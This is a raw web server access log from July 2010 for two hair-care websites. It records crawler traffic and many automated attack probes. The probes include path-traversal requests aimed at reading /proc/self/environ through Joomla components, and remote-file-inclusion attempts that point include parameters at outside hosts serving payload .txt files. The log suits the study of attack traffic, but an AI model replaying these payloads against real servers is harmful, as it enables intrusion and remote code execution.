129.97.219.71 - - [12/Jul/2010:16:36:12 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "growlonghairfast.com"
85.25.143.96 - - [12/Jul/2010:16:38:49 -0700] "GET /logs/access_100614.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.freehairsecrets.com"
122.155.3.162 - - [12/Jul/2010:16:40:26 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
122.155.3.162 - - [12/Jul/2010:16:40:27 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
122.155.3.162 - - [12/Jul/2010:16:40:30 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
88.250.57.232 - - [12/Jul/2010:16:43:39 -0700] "GET /logs/access_100712.log HTTP/1.0" 200 3369302 "-" "Wget/1.11.4" "www.freehairsecrets.com"
88.250.57.232 - - [12/Jul/2010:16:44:52 -0700] "GET /logs/access_100712.log HTTP/1.0" 200 3369302 "-" "Wget/1.11.4" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:16:48:00 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:16:48:00 -0700] "GET /logs/?M=A HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:16:54:57 -0700] "GET /tmp/?D=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
81.21.78.22 - - [12/Jul/2010:16:56:35 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
81.21.78.22 - - [12/Jul/2010:16:56:36 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
81.21.78.22 - - [12/Jul/2010:16:56:36 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
81.21.78.22 - - [12/Jul/2010:16:57:42 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
118.168.101.61 - - [12/Jul/2010:16:59:55 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:17:00:25 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "growlonghairfast.com"
81.21.78.22 - - [12/Jul/2010:17:01:19 -0700] "GET /include/admin.lib.inc.php?site_path=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
81.21.78.22 - - [12/Jul/2010:17:12:34 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
81.21.78.22 - - [12/Jul/2010:17:12:34 -0700] "GET /include/admin.lib.inc.php?site_path=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
81.21.78.22 - - [12/Jul/2010:17:12:34 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:14:43 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:16:43 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:16:43 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:20:07 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:20:13 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
72.14.212.86 - - [12/Jul/2010:17:21:41 -0700] "GET /logs/access_100315.log HTTP/1.1" 200 2504047 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp),gzip(gfe) (via docs.google.com/viewer)" "growlonghairfast.com"
78.47.81.34 - - [12/Jul/2010:17:22:33 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:17:24:42 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "growlonghairfast.com"
91.212.226.210 - - [12/Jul/2010:17:27:59 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)" "growlonghairfast.com"
91.212.226.210 - - [12/Jul/2010:17:27:59 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)" "growlonghairfast.com"
195.5.163.206 - - [12/Jul/2010:17:29:31 -0700] "GET /logs/index.php?option=com_images&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:17:29:31 -0700] "GET /index.php?option=com_images&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:17:31:48 -0700] "GET /index.php?option=com_admin&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
67.202.61.240 - - [12/Jul/2010:17:34:46 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "growlonghairfast.com"
67.202.61.240 - - [12/Jul/2010:17:34:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6131#6131 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:36:02 -0700] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:36:17 -0700] "GET /logs/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:36:17 -0700] "GET /logs/access_100621.log/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:36:17 -0700] "GET /logs/access_100308.log/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:36:34 -0700] "GET /logs/access_100621.log%20%20/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:36:35 -0700] "GET /logs/access_100308.log%20%20/calendar//tools/send_reminders.php?noSet=0&includedir=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.45.51.48 - - [12/Jul/2010:17:37:27 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
91.212.226.210 - - [12/Jul/2010:17:39:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)" "freehairsecrets.com"
91.212.226.210 - - [12/Jul/2010:17:39:02 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)" "freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:17:47:53 -0700] "GET /logs/access_100628.log/index.php?option=com_admin&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
195.5.163.206 - - [12/Jul/2010:17:47:56 -0700] "GET /index.php?option=com_admin&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
195.5.163.206 - - [12/Jul/2010:17:47:56 -0700] "GET /logs/index.php?option=com_admin&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:17:49:00 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:50:50 -0700] "GET /logs/access_100614.log%20%20//conlib/local.php?cfg[path][contenido]=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:50:50 -0700] "GET /logs//conlib/local.php?cfg[path][contenido]=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:50:50 -0700] "GET /conlib/local.php?cfg[path][contenido]=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:52:21 -0700] "GET /conlib/local.php?cfg[path][contenido]=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:52:21 -0700] "GET /logs//conlib/local.php?cfg[path][contenido]=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:52:21 -0700] "GET /logs/access_100614.log%20%20//conlib/local.php?cfg[path][contenido]=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:53:41 -0700] "GET /include/wysiwyg/spaw_control.class.php?spaw_root=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:53:41 -0700] "GET /logs/access.log%20%20//include/wysiwyg/spaw_control.class.php?spaw_root=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:53:41 -0700] "GET /logs//include/wysiwyg/spaw_control.class.php?spaw_root=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.154.248.22 - - [12/Jul/2010:17:54:47 -0700] "GET /logs//main.php?sayfa=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.154.248.22 - - [12/Jul/2010:17:54:48 -0700] "GET /main.php?sayfa=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.154.248.22 - - [12/Jul/2010:17:54:48 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:55:07 -0700] "GET /include/wysiwyg/spaw_control.class.php?spaw_root=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.232.217.226 - - [12/Jul/2010:17:55:07 -0700] "GET /logs/access.log%20%20//include/wysiwyg/spaw_control.class.php?spaw_root=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.232.217.226 - - [12/Jul/2010:17:55:07 -0700] "GET /logs//include/wysiwyg/spaw_control.class.php?spaw_root=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:55:39 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:55:39 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:55:40 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:55:40 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:55:40 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.47.81.34 - - [12/Jul/2010:17:55:40 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:17:57:16 -0700] "GET /logs/access_100531.log/index.php?option=com_admin&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:58:12 -0700] "GET /logs/access_100614.log//conlib/local.php?cfg[path][contenido]=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:17:59:59 -0700] "GET /logs/access_100614.log//conlib/local.php?cfg[path][contenido]=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:18:00:51 -0700] "GET /logs/access.log//include/wysiwyg/spaw_control.class.php?spaw_root=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.217.226 - - [12/Jul/2010:18:02:01 -0700] "GET /logs/access.log//include/wysiwyg/spaw_control.class.php?spaw_root=http://96.0.181.28/plugins/content/ins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.30.139.151 - - [12/Jul/2010:18:10:05 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
83.30.139.151 - - [12/Jul/2010:18:10:05 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
208.115.111.245 - - [12/Jul/2010:18:13:24 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:18:13:36 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
93.96.129.36 - - [12/Jul/2010:18:20:26 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)" "www.freehairsecrets.com"
93.96.129.36 - - [12/Jul/2010:18:20:26 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)" "www.freehairsecrets.com"
208.115.111.248 - - [12/Jul/2010:18:21:19 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
213.189.224.16 - - [12/Jul/2010:18:26:05 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:18:32:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13117 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:18:32:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5149 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:18:32:36 -0700] "GET /logs/?D=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:18:32:41 -0700] "GET /logs/?M=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:18:32:45 -0700] "GET /logs/?S=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:18:32:51 -0700] "GET /logs/access_091012.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:18:32:56 -0700] "GET /logs/access_091019.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:18:33:36 -0700] "GET /logs/access_091026.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:18:33:41 -0700] "GET /logs/access_091102.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:18:33:46 -0700] "GET /logs/access_091109.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:18:38:32 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "growlonghairfast.com"
112.105.117.208 - - [12/Jul/2010:18:40:48 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:18:54:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:18:54:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:18:54:48 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:18:54:54 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
213.189.224.16 - - [12/Jul/2010:18:55:08 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
213.189.224.16 - - [12/Jul/2010:18:55:08 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
213.189.224.16 - - [12/Jul/2010:18:55:09 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:18:55:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:18:55:16 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:18:55:20 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:18:55:26 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:18:55:29 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:18:55:30 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:18:56:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:18:57:34 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:18:58:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:18:58:34 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:18:59:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:03:00 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:03:00 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:03:00 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
124.115.6.16 - - [12/Jul/2010:19:03:28 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:03:33 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:03:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:03:33 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:03:53 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:04:01 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:04:05 -0700] "GET /logs/access_100628.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
